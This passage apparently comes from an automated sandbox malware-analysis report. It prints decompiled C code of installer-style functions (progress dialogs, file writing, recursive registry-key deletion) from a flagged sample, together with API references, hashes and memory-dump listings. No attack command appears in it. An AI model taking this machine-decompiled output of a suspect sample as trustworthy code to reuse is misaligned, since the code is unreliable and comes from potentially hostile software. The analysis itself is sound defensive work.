						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                                                                                              0x0040303d
                                                                                              0x0040303f
                                                                                              0x00403046
                                                                                              0x00403049
                                                                                              0x00403049
                                                                                              0x0040304f
                                                                                              0x00000000
                                                                                              0x0040304f
                                                                                              0x0040305d
                                                                                              0x00000000
                                                                                              0x00403060
                                                                                              0x00403067
                                                                                              0x00403073
                                                                                              0x0040307b
                                                                                              0x004030b9
                                                                                              0x004030c2
                                                                                              0x00000000
                                                                                              0x004030c7
                                                                                              0x00403084
                                                                                              0x00403095
                                                                                              0x00000000
                                                                                              0x004030a3
                                                                                              0x00403084
                                                                                              0x004030cf

                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                                                              • GetTickCount.KERNEL32 ref: 00403067
                                                                                              • wsprintfW.USER32 ref: 00403095
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                              • CreateDialogParamW.USER32 ref: 004030B9
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                                                • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                              • String ID: ... %d%%
                                                                                              • API String ID: 722711167-2449383134
                                                                                              • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                                              • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                                              • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                                              • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                              0x00404f8d
                                                                                              0x00404f9a
                                                                                              0x00404fa0
                                                                                              0x00404fde
                                                                                              0x00404fde
                                                                                              0x00404fed
                                                                                              0x00404ff4
                                                                                              0x00000000
                                                                                              0x00404ff6
                                                                                              0x00404fa2
                                                                                              0x00404fb1
                                                                                              0x00404fb9
                                                                                              0x00404fbc
                                                                                              0x00404fce
                                                                                              0x00404fd4
                                                                                              0x00404fdb
                                                                                              0x00000000
                                                                                              0x00404fdb
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                                              • GetMessagePos.USER32 ref: 00404FA2
                                                                                              • ScreenToClient.USER32 ref: 00404FBC
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$ClientScreen
                                                                                              • String ID: f
                                                                                              • API String ID: 41195575-1993550816
                                                                                              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                              • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                                              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                              • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                                              0x00402fa3
                                                                                              0x00402fb1
                                                                                              0x00402fb7
                                                                                              0x00402fb7
                                                                                              0x00402fc5
                                                                                              0x00402fc7
                                                                                              0x00402fd3
                                                                                              0x00402fd8
                                                                                              0x00402fda
                                                                                              0x00402fda
                                                                                              0x00402fe5
                                                                                              0x00402ff5
                                                                                              0x00403007
                                                                                              0x00403007
                                                                                              0x0040300f

                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                              • wsprintfW.USER32 ref: 00402FE5
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                                                              • SetDlgItemTextW.USER32 ref: 00403007
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                              • API String ID: 1451636040-1158693248
                                                                                              • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                              • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                                              • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                              • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 93%
                                                                                              			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                                                              0x00402950
                                                                                              0x00402952
                                                                                              0x00402957
                                                                                              0x0040295c
                                                                                              0x0040295f
                                                                                              0x00402969
                                                                                              0x0040296d
                                                                                              0x0040296d
                                                                                              0x00402973
                                                                                              0x00402980
                                                                                              0x00402988
                                                                                              0x0040298b
                                                                                              0x00402997
                                                                                              0x0040299a
                                                                                              0x004029a0
                                                                                              0x004029ae
                                                                                              0x004029b3
                                                                                              0x004029b7
                                                                                              0x004029ba
                                                                                              0x004029c3
                                                                                              0x004029cf
                                                                                              0x004029d3
                                                                                              0x004029d6
                                                                                              0x004029e0
                                                                                              0x004029ff
                                                                                              0x004029e7
                                                                                              0x004029ec
                                                                                              0x004029f4
                                                                                              0x004029f7
                                                                                              0x004029fc
                                                                                              0x004029fc
                                                                                              0x00402a06
                                                                                              0x00402a06
                                                                                              0x00402a13
                                                                                              0x00402a19
                                                                                              0x00402a1f
                                                                                              0x00402a1f
                                                                                              0x004029b7
                                                                                              0x00402a33
                                                                                              0x00402a35
                                                                                              0x00402a35
                                                                                              0x00402a3f
                                                                                              0x00402a40
                                                                                              0x00402a44
                                                                                              0x00402a48
                                                                                              0x00402a4e
                                                                                              0x00402a4e
                                                                                              0x00402a55
                                                                                              0x004022f1
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                              • GlobalFree.KERNEL32 ref: 00402A06
                                                                                              • GlobalFree.KERNEL32 ref: 00402A19
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2667972263-0
                                                                                              • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                              • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                                              • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                              • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 77%
                                                                                              			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                                                                                              0x00404e7a
                                                                                              0x00404e7f
                                                                                              0x00404e87
                                                                                              0x00404e88
                                                                                              0x00404e95
                                                                                              0x00404e9d
                                                                                              0x00404e9e
                                                                                              0x00404ea0
                                                                                              0x00404ea2
                                                                                              0x00404ea4
                                                                                              0x00404ea7
                                                                                              0x00404ea7
                                                                                              0x00404eae
                                                                                              0x00404eb4
                                                                                              0x00404eb4
                                                                                              0x00404ebb
                                                                                              0x00404ec2
                                                                                              0x00404ec5
                                                                                              0x00404ec8
                                                                                              0x00404ec8
                                                                                              0x00404ecc
                                                                                              0x00404edc
                                                                                              0x00404ede
                                                                                              0x00404ee1
                                                                                              0x00404e8a
                                                                                              0x00404e8a
                                                                                              0x00404e91
                                                                                              0x00404e91
                                                                                              0x00404ee9
                                                                                              0x00404ef4
                                                                                              0x00404f0a
                                                                                              0x00404f1b
                                                                                              0x00404f37

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                              • wsprintfW.USER32 ref: 00404F1B
                                                                                              • SetDlgItemTextW.USER32 ref: 00404F2E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s$H7B
                                                                                              • API String ID: 3540041739-107966168
                                                                                              • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                              • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                                              • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                              • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 48%
                                                                                              			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                              0x00402eb4
                                                                                              0x00402ebd
                                                                                              0x00402ec6
                                                                                              0x00402ed2
                                                                                              0x00402edb
                                                                                              0x00402ee5
                                                                                              0x00402f0a
                                                                                              0x00402f10
                                                                                              0x00402f15
                                                                                              0x00402f16
                                                                                              0x00402f46
                                                                                              0x00402f1f
                                                                                              0x00402f21
                                                                                              0x00402f71
                                                                                              0x00402f74
                                                                                              0x00000000
                                                                                              0x00402f7a
                                                                                              0x00402f30
                                                                                              0x00402f35
                                                                                              0x00402f37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402f3f
                                                                                              0x00402f44
                                                                                              0x00402f45
                                                                                              0x00402f45
                                                                                              0x00402f52
                                                                                              0x00402f5a
                                                                                              0x00402f61
                                                                                              0x00000000
                                                                                              0x00402f8a
                                                                                              0x00000000
                                                                                              0x00402f69
                                                                                              0x00402ef5
                                                                                              0x00402f08
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402f08
                                                                                              0x00402f90

                                                                                              APIs
                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                              • String ID:
                                                                                              • API String ID: 1354259210-0
                                                                                              • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                              • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                                              • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                              • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 77%
                                                                                              			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                              0x00401d81
                                                                                              0x00401d85
                                                                                              0x00401d9a
                                                                                              0x00401d87
                                                                                              0x00401d89
                                                                                              0x00401d8f
                                                                                              0x00401d8f
                                                                                              0x00401da0
                                                                                              0x00401da3
                                                                                              0x00401dad
                                                                                              0x00401db0
                                                                                              0x00401db8
                                                                                              0x00401dc9
                                                                                              0x00401dcc
                                                                                              0x00401dd7
                                                                                              0x00401dce
                                                                                              0x00401dd0
                                                                                              0x00401dd0
                                                                                              0x00401ddb
                                                                                              0x00401de5
                                                                                              0x00401e0c
                                                                                              0x00401e1b
                                                                                              0x00401e29
                                                                                              0x00401e31
                                                                                              0x00401e39
                                                                                              0x00401e39
                                                                                              0x00401e42
                                                                                              0x00401e48
                                                                                              0x00402ba4
                                                                                              0x00402ba4
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              Memory Dump Source
